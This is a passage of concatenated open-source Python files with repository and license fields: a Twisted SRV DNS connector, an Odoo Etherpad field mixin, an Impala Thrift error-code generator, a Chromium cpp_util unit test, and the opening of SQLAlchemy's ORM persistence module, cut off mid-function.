        self.orderedServers = None # list of servers already used in this round

    def connect(self):
        """Start connection to remote server."""
        self.factory.doStart()
        self.factory.startedConnecting(self)

        if not self.servers:
            if self.domain is None:
                self.connectionFailed(error.DNSLookupError("Domain is not defined."))
                return
            # First attempt: resolve the _service._protocol.domain SRV
            # record, then pick a server and connect.
            d = client.lookupService('_%s._%s.%s' % (self.service,
                                                     self.protocol,
                                                     self.domain))
            d.addCallbacks(self._cbGotServers, self._ebGotServers)
            d.addCallback(lambda x, self=self: self._reallyConnect())
            if self._defaultPort:
                d.addErrback(self._ebServiceUnknown)
            d.addErrback(self.connectionFailed)
        elif self.connector is None:
            self._reallyConnect()
        else:
            self.connector.connect()

    def _ebGotServers(self, failure):
        failure.trap(DNSNameError)

        # Some DNS servers reply with NXDOMAIN when in fact there are
        # just no SRV records for that domain. Act as if we just got an
        # empty response and use fallback.
        self.servers = []
        self.orderedServers = []

    def _cbGotServers(self, (answers, auth, add)):
        # A single SRV record with target "." means the service is
        # explicitly not provided for this domain (RFC 2782).
        if len(answers) == 1 and answers[0].type == dns.SRV \
           and answers[0].payload \
           and answers[0].payload.target == dns.Name('.'):
            # decidedly not available
            raise error.DNSLookupError("Service %s not available for domain %s."
                                       % (repr(self.service), repr(self.domain)))

        self.servers = []
        self.orderedServers = []
        for a in answers:
            if a.type != dns.SRV or not a.payload:
                continue
            # Store (priority, weight, host, port) tuples for pickServer().
            self.orderedServers.append((a.payload.priority, a.payload.weight,
                                        str(a.payload.target), a.payload.port))

    def _ebServiceUnknown(self, failure):
        """
        Connect to the default port when the service name is unknown.

        If no SRV records were found, the service name will be passed as the
        port. If resolving the name fails with
        L{error.ServiceNameUnknownError}, a final attempt is done using the
        default port.
        """
        failure.trap(error.ServiceNameUnknownError)
        self.servers = [(0, 0, self.domain, self._defaultPort)]
        self.orderedServers = []
        self.connect()

    def _serverCmp(self, a, b):
        # Sort by priority first, then weight (Python 2 cmp-style).
        if a[0]!=b[0]:
            return cmp(a[0], b[0])
        else:
            return cmp(a[1], b[1])

    def pickServer(self):
        """Return a (host, port) choice among the resolved SRV servers."""
        assert self.servers is not None
        assert self.orderedServers is not None

        if not self.servers and not self.orderedServers:
            # no SRV record, fall back..
            return self.domain, self.service

        if not self.servers and self.orderedServers:
            # start new round
            self.servers = self.orderedServers
            self.orderedServers = []

        assert self.servers

        self.servers.sort(self._serverCmp)
        minPriority=self.servers[0][0]

        # Weighted selection among the servers sharing the lowest priority.
        weightIndex = zip(xrange(len(self.servers)), [x[1] for x in self.servers
                                                      if x[0]==minPriority])
        weightSum = reduce(lambda x, y: (None, x[1]+y[1]), weightIndex, (None, 0))[1]

        # NOTE(review): ``rand`` is computed but never used below -- the loop
        # decrements weightSum instead, so the choice is not actually random.
        # This looks like a bug relative to the RFC 2782 weighted algorithm;
        # confirm against upstream.
        rand = random.randint(0, weightSum)

        for index, weight in weightIndex:
            weightSum -= weight
            if weightSum <= 0:
                chosen = self.servers[index]
                del self.servers[index]
                self.orderedServers.append(chosen)

                p, w, host, port = chosen
                return host, port

        raise RuntimeError, 'Impossible %s pickServer result.' % self.__class__.__name__

    def _reallyConnect(self):
        if self.stopAfterDNS:
            self.stopAfterDNS=0
            return

        self.host, self.port = self.pickServer()
        assert self.host is not None, 'Must have a host to connect to.'
        assert self.port is not None, 'Must have a port to connect to.'

        connectFunc = getattr(self.reactor, self.connectFuncName)
        self.connector=connectFunc(
            self.host, self.port,
            _SRVConnector_ClientFactoryWrapper(self, self.factory),
            *self.connectFuncArgs, **self.connectFuncKwArgs)

    def stopConnecting(self):
        """Stop attempting to connect."""
        if self.connector:
            self.connector.stopConnecting()
        else:
            # DNS lookup still pending; tell _reallyConnect to bail out.
            self.stopAfterDNS=1

    def disconnect(self):
        """Disconnect whatever our are state is."""
        if self.connector is not None:
            self.connector.disconnect()
        else:
            self.stopConnecting()

    def getDestination(self):
        assert self.connector
        return self.connector.getDestination()

    def connectionFailed(self, reason):
        self.factory.clientConnectionFailed(self, reason)
        self.factory.doStop()

    def connectionLost(self, reason):
        self.factory.clientConnectionLost(self, reason)
        self.factory.doStop()
| gpl-2.0 |
oihane/odoo | addons/pad/pad.py | 84 | 4296 | # -*- coding: utf-8 -*-
from openerp.osv import fields, osv
import random
import re
import string
import urllib2
import logging
from openerp import SUPERUSER_ID
from openerp.tools.translate import _
from openerp.tools import html2plaintext
from py_etherpad import EtherpadLiteClient
_logger = logging.getLogger(__name__)
class pad_common(osv.osv_memory):
    """Mixin giving OpenERP models Etherpad-backed fields.

    Fields carrying a ``pad_content_field`` attribute store an Etherpad URL;
    the real HTML content lives in the companion field named by that
    attribute.  (Python 2 module: ``urllib2``, ``iteritems``.)
    """
    _name = 'pad.common'

    def pad_is_configured(self, cr, uid, context=None):
        # True when the user's company has a pad server URL configured.
        user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
        return bool(user.company_id.pad_server)

    def pad_generate_url(self, cr, uid, context=None):
        """Build a fresh pad URL (and optionally create/fill the pad).

        Returns a dict with 'server', 'path' and 'url' keys; 'url' is only
        present when a server is configured.
        """
        company = self.pool.get('res.users').browse(cr, SUPERUSER_ID, uid, context=context).company_id

        pad = {
            "server" : company.pad_server,
            "key" : company.pad_key,
        }

        # make sure pad server in the form of http://hostname
        if not pad["server"]:
            return pad
        if not pad["server"].startswith('http'):
            pad["server"] = 'http://' + pad["server"]
        pad["server"] = pad["server"].rstrip('/')
        # generate a salt
        # NOTE(review): uses ``random``, so pad paths are predictable; if the
        # path is meant to be unguessable, ``secrets``/os.urandom would be
        # needed -- confirm the threat model.
        s = string.ascii_uppercase + string.digits
        salt = ''.join([s[random.randint(0, len(s) - 1)] for i in range(10)])
        #path
        # etherpad hardcodes pad id length limit to 50
        path = '-%s-%s' % (self._name, salt)
        path = '%s%s' % (cr.dbname.replace('_','-')[0:50 - len(path)], path)
        # construct the url
        url = '%s/p/%s' % (pad["server"], path)

        # if created with content, push the current field value into the pad
        if "field_name" in context and "model" in context and "object_id" in context:
            myPad = EtherpadLiteClient( pad["key"], pad["server"]+'/api')
            try:
                myPad.createPad(path)
            except urllib2.URLError:
                raise osv.except_osv(_("Error"), _("Pad creation failed, \
either there is a problem with your pad server URL or with your connection."))

            #get attr on the field model
            model = self.pool[context["model"]]
            field = model._fields[context['field_name']]
            real_field = field.pad_content_field

            #get content of the real field
            for record in model.browse(cr, uid, [context["object_id"]]):
                if record[real_field]:
                    myPad.setText(path, (html2plaintext(record[real_field]).encode('utf-8')))
                    #Etherpad for html not functional
                    #myPad.setHTML(path, record[real_field])

        return {
            "server": pad["server"],
            "path": path,
            "url": url,
        }

    def pad_get_content(self, cr, uid, url, context=None):
        """Fetch the pad's HTML body from its export endpoint ('' on failure)."""
        content = ''
        if url:
            try:
                page = urllib2.urlopen('%s/export/html'%url).read()
                mo = re.search('<body>(.*)</body>',page)
                if mo:
                    content = mo.group(1)
            # NOTE(review): bare except swallows everything (including
            # KeyboardInterrupt); ``except Exception`` would be safer.
            except:
                _logger.warning("No url found '%s'.", url)
        return content

    # TODO
    # reverse engineer protocol to be setHtml without using the api key
    def write(self, cr, uid, ids, vals, context=None):
        # Sync pad content back into the real field before writing.
        self._set_pad_value(cr, uid, vals, context)
        return super(pad_common, self).write(cr, uid, ids, vals, context=context)

    def create(self, cr, uid, vals, context=None):
        self._set_pad_value(cr, uid, vals, context)
        return super(pad_common, self).create(cr, uid, vals, context=context)

    # Set the pad content in vals: for every pad field being written, fetch
    # the pad's current content and store it into the companion field.
    def _set_pad_value(self, cr, uid, vals, context=None):
        for k,v in vals.items():
            field = self._fields[k]
            if hasattr(field,'pad_content_field'):
                vals[field.pad_content_field] = self.pad_get_content(cr, uid, v, context=context)

    def copy(self, cr, uid, id, default=None, context=None):
        # Duplicated records get fresh pad URLs instead of sharing pads.
        if not default:
            default = {}
        for k, field in self._fields.iteritems():
            if hasattr(field,'pad_content_field'):
                pad = self.pad_generate_url(cr, uid, context)
                default[k] = pad.get('url')
        return super(pad_common, self).copy(cr, uid, id, default, context)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
pcmoritz/arrow | cpp/src/arrow/dbi/hiveserver2/thrift/generate_error_codes.py | 12 | 11132 | #!/usr/bin/env python
# Copyright 2015 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os
# For readability purposes we define the error codes and messages at the top of the
# file. New codes and messages must be added here. Old error messages MUST NEVER BE
# DELETED, but can be renamed. The tuple layout for a new entry is: error code enum name,
# numeric error code, format string of the message.
#
# TODO Add support for SQL Error Codes
# https://msdn.microsoft.com/en-us/library/ms714687%28v=vs.85%29.aspx
# Table of (CONSTANT_NAME, numeric_code, message_template) triples.
# check_duplicates() below enforces unique names and gapless codes from 0.
error_codes = (
  ("OK", 0, ""),
  ("UNUSED", 1, "<UNUSED>"),
  ("GENERAL", 2, "$0"),
  ("CANCELLED", 3, "$0"),
  ("ANALYSIS_ERROR", 4, "$0"),
  ("NOT_IMPLEMENTED_ERROR", 5, "$0"),
  ("RUNTIME_ERROR", 6, "$0"),
  ("MEM_LIMIT_EXCEEDED", 7, "$0"),
  ("INTERNAL_ERROR", 8, "$0"),
  ("RECOVERABLE_ERROR", 9, "$0"),
  ("PARQUET_MULTIPLE_BLOCKS", 10,
   "Parquet files should not be split into multiple hdfs-blocks. file=$0"),
  ("PARQUET_COLUMN_METADATA_INVALID", 11,
   "Column metadata states there are $0 values, but read $1 values from column $2. "
   "file=$3"),
  ("PARQUET_HEADER_PAGE_SIZE_EXCEEDED", 12, "(unused)"),
  ("PARQUET_HEADER_EOF", 13,
   "ParquetScanner: reached EOF while deserializing data page header. file=$0"),
  ("PARQUET_GROUP_ROW_COUNT_ERROR", 14,
   "Metadata states that in group $0($1) there are $2 rows, but $3 rows were read."),
  ("PARQUET_GROUP_ROW_COUNT_OVERFLOW", 15, "(unused)"),
  ("PARQUET_MISSING_PRECISION", 16,
   "File '$0' column '$1' does not have the decimal precision set."),
  ("PARQUET_WRONG_PRECISION", 17,
   "File '$0' column '$1' has a precision that does not match the table metadata "
   " precision. File metadata precision: $2, table metadata precision: $3."),
  ("PARQUET_BAD_CONVERTED_TYPE", 18,
   "File '$0' column '$1' does not have converted type set to DECIMAL"),
  ("PARQUET_INCOMPATIBLE_DECIMAL", 19,
   "File '$0' column '$1' contains decimal data but the table metadata has type $2"),
  ("SEQUENCE_SCANNER_PARSE_ERROR", 20,
   "Problem parsing file $0 at $1$2"),
  ("SNAPPY_DECOMPRESS_INVALID_BLOCK_SIZE", 21,
   "Decompressor: block size is too big. Data is likely corrupt. Size: $0"),
  ("SNAPPY_DECOMPRESS_INVALID_COMPRESSED_LENGTH", 22,
   "Decompressor: invalid compressed length. Data is likely corrupt."),
  ("SNAPPY_DECOMPRESS_UNCOMPRESSED_LENGTH_FAILED", 23,
   "Snappy: GetUncompressedLength failed"),
  ("SNAPPY_DECOMPRESS_RAW_UNCOMPRESS_FAILED", 24,
   "SnappyBlock: RawUncompress failed"),
  ("SNAPPY_DECOMPRESS_DECOMPRESS_SIZE_INCORRECT", 25,
   "Snappy: Decompressed size is not correct."),
  ("HDFS_SCAN_NODE_UNKNOWN_DISK", 26, "Unknown disk id. "
   "This will negatively affect performance. "
   "Check your hdfs settings to enable block location metadata."),
  ("FRAGMENT_EXECUTOR", 27, "Reserved resource size ($0) is larger than "
   "query mem limit ($1), and will be restricted to $1. Configure the reservation "
   "size by setting RM_INITIAL_MEM."),
  ("PARTITIONED_HASH_JOIN_MAX_PARTITION_DEPTH", 28,
   "Cannot perform join at hash join node with id $0."
   " The input data was partitioned the maximum number of $1 times."
   " This could mean there is significant skew in the data or the memory limit is"
   " set too low."),
  ("PARTITIONED_AGG_MAX_PARTITION_DEPTH", 29,
   "Cannot perform aggregation at hash aggregation node with id $0."
   " The input data was partitioned the maximum number of $1 times."
   " This could mean there is significant skew in the data or the memory limit is"
   " set too low."),
  ("MISSING_BUILTIN", 30, "Builtin '$0' with symbol '$1' does not exist. "
   "Verify that all your impalads are the same version."),
  ("RPC_GENERAL_ERROR", 31, "RPC Error: $0"),
  ("RPC_TIMEOUT", 32, "RPC timed out"),
  ("UDF_VERIFY_FAILED", 33,
   "Failed to verify function $0 from LLVM module $1, see log for more details."),
  ("PARQUET_CORRUPT_VALUE", 34, "File $0 corrupt. RLE level data bytes = $1"),
  ("AVRO_DECIMAL_RESOLUTION_ERROR", 35, "Column '$0' has conflicting Avro decimal types. "
   "Table schema $1: $2, file schema $1: $3"),
  ("AVRO_DECIMAL_METADATA_MISMATCH", 36, "Column '$0' has conflicting Avro decimal types. "
   "Declared $1: $2, $1 in table's Avro schema: $3"),
  ("AVRO_SCHEMA_RESOLUTION_ERROR", 37, "Unresolvable types for column '$0': "
   "table type: $1, file type: $2"),
  ("AVRO_SCHEMA_METADATA_MISMATCH", 38, "Unresolvable types for column '$0': "
   "declared column type: $1, table's Avro schema type: $2"),
  ("AVRO_UNSUPPORTED_DEFAULT_VALUE", 39, "Field $0 is missing from file and default "
   "values of type $1 are not yet supported."),
  ("AVRO_MISSING_FIELD", 40, "Inconsistent table metadata. Mismatch between column "
   "definition and Avro schema: cannot read field $0 because there are only $1 fields."),
  ("AVRO_MISSING_DEFAULT", 41,
   "Field $0 is missing from file and does not have a default value."),
  ("AVRO_NULLABILITY_MISMATCH", 42,
   "Field $0 is nullable in the file schema but not the table schema."),
  ("AVRO_NOT_A_RECORD", 43,
   "Inconsistent table metadata. Field $0 is not a record in the Avro schema."),
  ("PARQUET_DEF_LEVEL_ERROR", 44, "Could not read definition level, even though metadata"
   " states there are $0 values remaining in data page. file=$1"),
  ("PARQUET_NUM_COL_VALS_ERROR", 45, "Mismatched number of values in column index $0 "
   "($1 vs. $2). file=$3"),
  ("PARQUET_DICT_DECODE_FAILURE", 46, "Failed to decode dictionary-encoded value. "
   "file=$0"),
  ("SSL_PASSWORD_CMD_FAILED", 47,
   "SSL private-key password command ('$0') failed with error: $1"),
  ("SSL_CERTIFICATE_PATH_BLANK", 48, "The SSL certificate path is blank"),
  ("SSL_PRIVATE_KEY_PATH_BLANK", 49, "The SSL private key path is blank"),
  ("SSL_CERTIFICATE_NOT_FOUND", 50, "The SSL certificate file does not exist at path $0"),
  ("SSL_PRIVATE_KEY_NOT_FOUND", 51, "The SSL private key file does not exist at path $0"),
  ("SSL_SOCKET_CREATION_FAILED", 52, "SSL socket creation failed: $0"),
  ("MEM_ALLOC_FAILED", 53, "Memory allocation of $0 bytes failed"),
  ("PARQUET_REP_LEVEL_ERROR", 54, "Could not read repetition level, even though metadata"
   " states there are $0 values remaining in data page. file=$1"),
  ("PARQUET_UNRECOGNIZED_SCHEMA", 55, "File '$0' has an incompatible Parquet schema for "
   "column '$1'. Column type: $2, Parquet schema:\\n$3"),
  ("COLLECTION_ALLOC_FAILED", 56, "Failed to allocate buffer for collection '$0'."),
  ("TMP_DEVICE_BLACKLISTED", 57,
   "Temporary device for directory $0 is blacklisted from a previous error and cannot "
   "be used."),
  ("TMP_FILE_BLACKLISTED", 58,
   "Temporary file $0 is blacklisted from a previous error and cannot be expanded."),
  ("RPC_CLIENT_CONNECT_FAILURE", 59,
   "RPC client failed to connect: $0"),
  ("STALE_METADATA_FILE_TOO_SHORT", 60, "Metadata for file '$0' appears stale. "
   "Try running \\\"refresh $1\\\" to reload the file metadata."),
  ("PARQUET_BAD_VERSION_NUMBER", 61, "File '$0' has an invalid version number: $1\\n"
   "This could be due to stale metadata. Try running \\\"refresh $2\\\"."),
  ("SCANNER_INCOMPLETE_READ", 62, "Tried to read $0 bytes but could only read $1 bytes. "
   "This may indicate data file corruption. (file $2, byte offset: $3)"),
  ("SCANNER_INVALID_READ", 63, "Invalid read of $0 bytes. This may indicate data file "
   "corruption. (file $1, byte offset: $2)"),
  ("AVRO_BAD_VERSION_HEADER", 64, "File '$0' has an invalid version header: $1\\n"
   "Make sure the file is an Avro data file."),
  ("UDF_MEM_LIMIT_EXCEEDED", 65, "$0's allocations exceeded memory limits."),
  ("BTS_BLOCK_OVERFLOW", 66, "Cannot process row that is bigger than the IO size "
   "(row_size=$0, null_indicators_size=$1). To run this query, increase the IO size "
   "(--read_size option)."),
  ("COMPRESSED_FILE_MULTIPLE_BLOCKS", 67,
   "For better performance, snappy-, gzip-, and bzip-compressed files "
   "should not be split into multiple HDFS blocks. file=$0 offset $1"),
  ("COMPRESSED_FILE_BLOCK_CORRUPTED", 68,
   "$0 Data error, likely data corrupted in this block."),
  ("COMPRESSED_FILE_DECOMPRESSOR_ERROR", 69, "$0 Decompressor error at $1, code=$2"),
  ("COMPRESSED_FILE_DECOMPRESSOR_NO_PROGRESS", 70,
   "Decompression failed to make progress, but end of input is not reached. "
   "File appears corrupted. file=$0"),
  ("COMPRESSED_FILE_TRUNCATED", 71,
   "Unexpected end of compressed file. File may be truncated. file=$0")
)
# Verifies the uniqueness of the error constants and numeric error codes.
# Numeric codes must start from 0, be in order and have no gaps
def check_duplicates(codes):
    """Validate the error-code table: constant names must be unique and the
    numeric codes must be exactly 0..N-1 in order (no gaps, no repeats).
    Exits the process with status 1 on the first violation found."""
    seen = {}
    expected = 0
    for name, num, message in codes:
        if name in seen:
            print("Constant %s already used, please check definition of '%s'!" % \
                (name, seen[name]))
            exit(1)
        if num != expected:
            print("Numeric error codes must start from 0, be in order, and not have any gaps: "
                  "got %d, expected %d" % (num, expected))
            exit(1)
        expected += 1
        seen[name] = message
preamble = """
// Copyright 2015 Cloudera Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
//
// THIS FILE IS AUTO GENERATED BY generated_error_codes.py DO NOT MODIFY
// IT BY HAND.
//
namespace cpp impala
namespace java com.cloudera.impala.thrift
"""
# The script will always generate the file, CMake will take care of running it only if
# necessary.
target_file = os.path.join(sys.argv[1], "ErrorCodes.thrift")

# Check uniqueness of error constants and numeric codes
check_duplicates(error_codes)

# A context manager guarantees the handle is closed even if a write raises,
# replacing the previous manual try/finally around fid.close().
with open(target_file, "w+") as fid:
    fid.write(preamble)
    # Enum of symbolic error constants.
    fid.write("""\nenum TErrorCode {\n""")
    fid.write(",\n".join(map(lambda x: "  %s = %d" % (x[0], x[1]), error_codes)))
    fid.write("\n}")
    fid.write("\n")
    # Parallel list of message templates, indexed by the enum value.
    fid.write("const list<string> TErrorMessage = [\n")
    fid.write(",\n".join(map(lambda x: "  // %s\n  \"%s\"" %(x[0], x[2]), error_codes)))
    fid.write("\n]")

print("%s created." % target_file)
| apache-2.0 |
Teamxrtc/webrtc-streaming-node | third_party/webrtc/src/chromium/src/tools/json_schema_compiler/cpp_util_test.py | 96 | 2096 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from cpp_util import (
Classname, CloseNamespace, GenerateIfndefName, OpenNamespace)
class CppUtilTest(unittest.TestCase):
  """Unit tests for the cpp_util helpers: Classname conversion, namespace
  open/close rendering, and include-guard name generation.

  Note: uses assertEqual throughout; the assertEquals spelling is a
  deprecated alias that was removed in Python 3.12.
  """

  def testClassname(self):
    self.assertEqual('Permissions', Classname('permissions'))
    self.assertEqual('UpdateAllTheThings',
                     Classname('updateAllTheThings'))
    self.assertEqual('Aa_Bb_Cc', Classname('aa.bb.cc'))

  def testNamespaceDeclaration(self):
    self.assertEqual('namespace foo {',
                     OpenNamespace('foo').Render())
    self.assertEqual('}  // namespace foo',
                     CloseNamespace('foo').Render())

    self.assertEqual(
        'namespace extensions {\n'
        'namespace foo {',
        OpenNamespace('extensions::foo').Render())
    self.assertEqual(
        '}  // namespace foo\n'
        '}  // namespace extensions',
        CloseNamespace('extensions::foo').Render())

    self.assertEqual(
        'namespace extensions {\n'
        'namespace gen {\n'
        'namespace api {',
        OpenNamespace('extensions::gen::api').Render())
    self.assertEqual(
        '}  // namespace api\n'
        '}  // namespace gen\n'
        '}  // namespace extensions',
        CloseNamespace('extensions::gen::api').Render())

    self.assertEqual(
        'namespace extensions {\n'
        'namespace gen {\n'
        'namespace api {\n'
        'namespace foo {',
        OpenNamespace('extensions::gen::api::foo').Render())
    self.assertEqual(
        '}  // namespace foo\n'
        '}  // namespace api\n'
        '}  // namespace gen\n'
        '}  // namespace extensions',
        CloseNamespace('extensions::gen::api::foo').Render())

  def testGenerateIfndefName(self):
    self.assertEqual('FOO_BAR_BAZ_H__', GenerateIfndefName('foo\\bar\\baz.h'))
    self.assertEqual('FOO_BAR_BAZ_H__', GenerateIfndefName('foo/bar/baz.h'))
# Run the test suite when this file is executed directly.
if __name__ == '__main__':
  unittest.main()
| mit |
lebabouin/CouchPotatoServer-develop | libs/sqlalchemy/orm/persistence.py | 18 | 30463 | # orm/persistence.py
# Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""private module containing functions used to emit INSERT, UPDATE
and DELETE statements on behalf of a :class:`.Mapper` and its descending
mappers.
The functions here are called only by the unit of work functions
in unitofwork.py.
"""
import operator
from itertools import groupby
from sqlalchemy import sql, util, exc as sa_exc
from sqlalchemy.orm import attributes, sync, \
exc as orm_exc
from sqlalchemy.orm.util import _state_mapper, state_str
def save_obj(base_mapper, states, uowtransaction, single=False):
    """Issue ``INSERT`` and/or ``UPDATE`` statements for a list
    of objects.

    This is called within the context of a UOWTransaction during a
    flush operation, given a list of states to be flushed.  The
    base mapper in an inheritance hierarchy handles the inserts/
    updates for all descendant mappers.

    """

    # if batch=false, call _save_obj separately for each object
    if not single and not base_mapper.batch:
        for state in _sort_states(states):
            save_obj(base_mapper, [state], uowtransaction, single=True)
        return

    # Split states into pending (INSERT) vs. persistent (UPDATE), firing
    # before_insert/before_update events along the way.
    states_to_insert, states_to_update = _organize_states_for_save(
                                                base_mapper,
                                                states,
                                                uowtransaction)

    cached_connections = _cached_connection_dict(base_mapper)

    # Tables are visited in foreign-key dependency order so parent rows
    # exist before dependent rows are written.
    for table, mapper in base_mapper._sorted_tables.iteritems():
        insert = _collect_insert_commands(base_mapper, uowtransaction,
                                table, states_to_insert)

        update = _collect_update_commands(base_mapper, uowtransaction,
                                table, states_to_update)

        if update:
            _emit_update_statements(base_mapper, uowtransaction,
                                    cached_connections,
                                    mapper, table, update)

        if insert:
            _emit_insert_statements(base_mapper, uowtransaction,
                                    cached_connections,
                                    table, insert)

    # Fire after_insert/after_update events and expire read-only attributes.
    _finalize_insert_update_commands(base_mapper, uowtransaction,
                                    states_to_insert, states_to_update)
def post_update(base_mapper, states, uowtransaction, post_update_cols):
    """Issue UPDATE statements on behalf of a relationship() which
    specifies post_update.

    Only the columns named in ``post_update_cols`` are considered; rows
    are matched on primary key.

    """
    cached_connections = _cached_connection_dict(base_mapper)

    states_to_update = _organize_states_for_post_update(
                                    base_mapper,
                                    states, uowtransaction)

    for table, mapper in base_mapper._sorted_tables.iteritems():
        update = _collect_post_update_commands(base_mapper, uowtransaction,
                                            table, states_to_update,
                                            post_update_cols)

        if update:
            _emit_post_update_statements(base_mapper, uowtransaction,
                                    cached_connections,
                                    mapper, table, update)
def delete_obj(base_mapper, states, uowtransaction):
    """Issue ``DELETE`` statements for a list of objects.

    This is called within the context of a UOWTransaction during a
    flush operation.

    """
    cached_connections = _cached_connection_dict(base_mapper)

    states_to_delete = _organize_states_for_delete(
                                    base_mapper,
                                    states,
                                    uowtransaction)

    table_to_mapper = base_mapper._sorted_tables

    # Delete in reverse dependency order: child rows first, parents last.
    for table in reversed(table_to_mapper.keys()):
        delete = _collect_delete_commands(base_mapper, uowtransaction,
                                table, states_to_delete)

        mapper = table_to_mapper[table]

        _emit_delete_statements(base_mapper, uowtransaction,
                    cached_connections, mapper, table, delete)

    # after_delete events fire once all DELETE statements have executed.
    for state, state_dict, mapper, has_identity, connection \
                                        in states_to_delete:
        mapper.dispatch.after_delete(mapper, connection, state)
def _organize_states_for_save(base_mapper, states, uowtransaction):
    """Make an initial pass across a set of states for INSERT or
    UPDATE.

    This includes splitting out into distinct lists for
    each, calling before_insert/before_update, obtaining
    key information for each state including its dictionary,
    mapper, the connection to use for the execution per state,
    and the identity flag.

    Returns a pair ``(states_to_insert, states_to_update)`` of tuples
    ``(state, dict, mapper, connection, has_identity, instance_key,
    row_switch)``.

    """

    states_to_insert = []
    states_to_update = []

    for state, dict_, mapper, connection in _connections_for_states(
                                            base_mapper, uowtransaction,
                                            states):

        # a state with an identity key has already been persisted
        has_identity = bool(state.key)
        instance_key = state.key or mapper._identity_key_from_state(state)

        row_switch = None

        # call before_XXX extensions
        if not has_identity:
            mapper.dispatch.before_insert(mapper, connection, state)
        else:
            mapper.dispatch.before_update(mapper, connection, state)

        # detect if we have a "pending" instance (i.e. has
        # no instance_key attached to it), and another instance
        # with the same identity key already exists as persistent.
        # convert to an UPDATE if so.
        if not has_identity and \
            instance_key in uowtransaction.session.identity_map:
            instance = \
                uowtransaction.session.identity_map[instance_key]
            existing = attributes.instance_state(instance)
            if not uowtransaction.is_deleted(existing):
                raise orm_exc.FlushError(
                    "New instance %s with identity key %s conflicts "
                    "with persistent instance %s" %
                    (state_str(state), instance_key,
                     state_str(existing)))

            base_mapper._log_debug(
                "detected row switch for identity %s.  "
                "will update %s, remove %s from "
                "transaction", instance_key,
                state_str(state), state_str(existing))

            # remove the "delete" flag from the existing element
            uowtransaction.remove_state_actions(existing)
            row_switch = existing

        if not has_identity and not row_switch:
            states_to_insert.append(
                (state, dict_, mapper, connection,
                has_identity, instance_key, row_switch)
            )
        else:
            states_to_update.append(
                (state, dict_, mapper, connection,
                has_identity, instance_key, row_switch)
            )

    return states_to_insert, states_to_update
def _organize_states_for_post_update(base_mapper, states,
                                            uowtransaction):
    """Make an initial pass across a set of states for UPDATE
    corresponding to post_update.

    This includes obtaining key information for each state
    including its dictionary, mapper, the connection to use for
    the execution per state.

    """
    records = _connections_for_states(base_mapper, uowtransaction, states)
    return [rec for rec in records]
def _organize_states_for_delete(base_mapper, states, uowtransaction):
    """Make an initial pass across a set of states for DELETE.

    This includes calling out before_delete and obtaining
    key information for each state including its dictionary,
    mapper, the connection to use for the execution per state.

    Returns a list of tuples
    ``(state, dict, mapper, has_identity, connection)``.

    """
    states_to_delete = []

    for state, dict_, mapper, connection in _connections_for_states(
                                            base_mapper, uowtransaction,
                                            states):

        mapper.dispatch.before_delete(mapper, connection, state)

        states_to_delete.append((state, dict_, mapper,
                bool(state.key), connection))
    return states_to_delete
def _collect_insert_commands(base_mapper, uowtransaction, table,
                                states_to_insert):
    """Identify sets of values to use in INSERT statements for a
    list of states.

    Returns a list of tuples ``(state, dict, params, mapper,
    connection, value_params, has_all_pks)``.  ``value_params`` holds
    SQL expressions (ClauseElements) that can't go through
    executemany; ``has_all_pks`` is False when a primary key value
    must be generated by the database.

    """
    insert = []
    for state, state_dict, mapper, connection, has_identity, \
                    instance_key, row_switch in states_to_insert:
        if table not in mapper._pks_by_table:
            continue

        pks = mapper._pks_by_table[table]

        params = {}
        value_params = {}

        has_all_pks = True
        for col in mapper._cols_by_table[table]:
            if col is mapper.version_id_col:
                # new rows start at the initial version
                params[col.key] = mapper.version_id_generator(None)
            else:
                # pull straight from the dict for
                # pending objects
                prop = mapper._columntoproperty[col]
                value = state_dict.get(prop.key, None)

                if value is None:
                    if col in pks:
                        has_all_pks = False
                    elif col.default is None and \
                         col.server_default is None:
                        # explicit NULL only when no default would apply
                        params[col.key] = value

                elif isinstance(value, sql.ClauseElement):
                    value_params[col] = value
                else:
                    params[col.key] = value

        insert.append((state, state_dict, params, mapper,
                        connection, value_params, has_all_pks))
    return insert
def _collect_update_commands(base_mapper, uowtransaction,
                                table, states_to_update):
    """Identify sets of values to use in UPDATE statements for a
    list of states.

    This function works intricately with the history system
    to determine exactly what values should be updated
    as well as how the row should be matched within an UPDATE
    statement.  Includes some tricky scenarios where the primary
    key of an object might have been changed.

    """

    update = []
    for state, state_dict, mapper, connection, has_identity, \
                    instance_key, row_switch in states_to_update:
        if table not in mapper._pks_by_table:
            continue

        pks = mapper._pks_by_table[table]

        # params keyed by col.key are SET values; params keyed by
        # col._label are WHERE-clause (row matching) values.
        params = {}
        value_params = {}

        hasdata = hasnull = False
        for col in mapper._cols_by_table[table]:
            if col is mapper.version_id_col:
                # match on the committed (pre-flush) version value
                params[col._label] = \
                    mapper._get_committed_state_attr_by_column(
                                    row_switch or state,
                                    row_switch and row_switch.dict
                                                or state_dict,
                                    col)

                prop = mapper._columntoproperty[col]
                history = attributes.get_state_history(
                    state, prop.key,
                    attributes.PASSIVE_NO_INITIALIZE
                )
                if history.added:
                    params[col.key] = history.added[0]
                    hasdata = True
                else:
                    params[col.key] = mapper.version_id_generator(
                                            params[col._label])

                    # HACK: check for history, in case the
                    # history is only
                    # in a different table than the one
                    # where the version_id_col is.
                    for prop in mapper._columntoproperty.itervalues():
                        history = attributes.get_state_history(
                                state, prop.key,
                                attributes.PASSIVE_NO_INITIALIZE)
